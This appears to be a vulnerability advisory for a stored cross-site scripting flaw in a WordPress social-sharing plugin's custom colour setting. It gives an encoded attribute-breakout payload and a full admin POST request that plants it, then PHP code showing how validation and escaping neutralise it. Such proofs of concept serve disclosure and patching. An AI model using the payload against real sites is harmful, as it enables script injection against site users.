## https://sploitus.com/exploit?id=WPEX-ID:9DEC8AC7-BEFD-4C9D-9A9E-7DA9E395DBF2
Intercept the request made when saving the settings and put the following payload in the `meks_ess_settings[color][custom_color]` parameter: `%23ffd635%22autofocus%20onfocus%3d%22alert(%2fXSS%2f)%22%2f%2f`.

```http
POST /wp-admin/options.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 634
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

option_page=meks-ess-settings&action=update&_wpnonce=5d8e1580fd&meks_ess_settings%5Bplatforms%5D%5B%5D=facebook&meks_ess_settings%5Bplatforms%5D%5B%5D=twitter&meks_ess_settings%5Bstyle%5D=1&meks_ess_settings%5Bvariant%5D=1&meks_ess_settings%5Bcolor%5D%5Btype%5D=brand&meks_ess_settings%5Bcolor%5D%5Bcustom_color%5D=%23ffd635%22autofocus%20onfocus%3d%22alert(%2fXSS%2f)%22%2f%2f&&meks_ess_settings%5Blocation%5D=above&meks_ess_settings%5Bpost_type%5D%5B%5D=post&meks_ess_settings%5Blabel_share%5D%5Btext%5D=Share+this&meks_ess_settings%5Blabel_share%5D%5Bactive%5D=0&meks_ess_settings%5Blabel_share%5D%5Bactive%5D=1&submit=Save+Changes
```

The XSS will be triggered when the settings page is viewed again.
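
Why the payload fires and how the field can be hardened, as an added example that is not the plugin's own code: it contrasts an unescaped attribute render with save-time validation and output-time escaping. The function names, the input markup and the `#000000` fallback are assumptions made for illustration; in WordPress the built-in counterparts of the two safe helpers are `sanitize_hex_color()` and `esc_attr()`.

```php
<?php
// Added illustration: hypothetical field rendering, not the plugin's source.

// Unsafe: the stored option value is concatenated into a quoted attribute as-is.
function render_color_field_unsafe(string $stored): string {
    return '<input type="text" name="meks_ess_settings[color][custom_color]" value="'
        . $stored . '">';
}

// Save-time allow-list: accept only #rgb or #rrggbb, otherwise store a fallback.
// The '#000000' fallback is an assumed default, not taken from the plugin.
function sanitize_custom_color($raw, string $default = '#000000'): string {
    if (is_string($raw) && preg_match('/\A#(?:[0-9a-fA-F]{3}){1,2}\z/', $raw) === 1) {
        return strtolower($raw);
    }
    return $default;
}

// Output-time escaping: encode the value for an HTML attribute context.
function render_color_field_safe(string $stored): string {
    $value = htmlspecialchars($stored, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="meks_ess_settings[color][custom_color]" value="'
        . $value . '">';
}

// The parameter value from the request above, URL-decoded as the server receives it.
$submitted = rawurldecode('%23ffd635%22autofocus%20onfocus%3d%22alert(%2fXSS%2f)%22%2f%2f');

// The double quote in the value closes the attribute early, so the rest of the
// string is parsed as further attributes of the input element.
echo render_color_field_unsafe($submitted), PHP_EOL;

// With escaping, the quote is emitted as &quot; and the whole string stays
// inside the value attribute as inert text.
echo render_color_field_safe($submitted), PHP_EOL;

// With validation on save, the submitted string never reaches the database.
echo sanitize_custom_color($submitted), PHP_EOL;

// A well-formed colour passes validation and is normalised to lower case.
echo sanitize_custom_color('#FFD635'), PHP_EOL;
```

Applying both controls covers the case where an unvalidated value is already stored from before the save-time check was added.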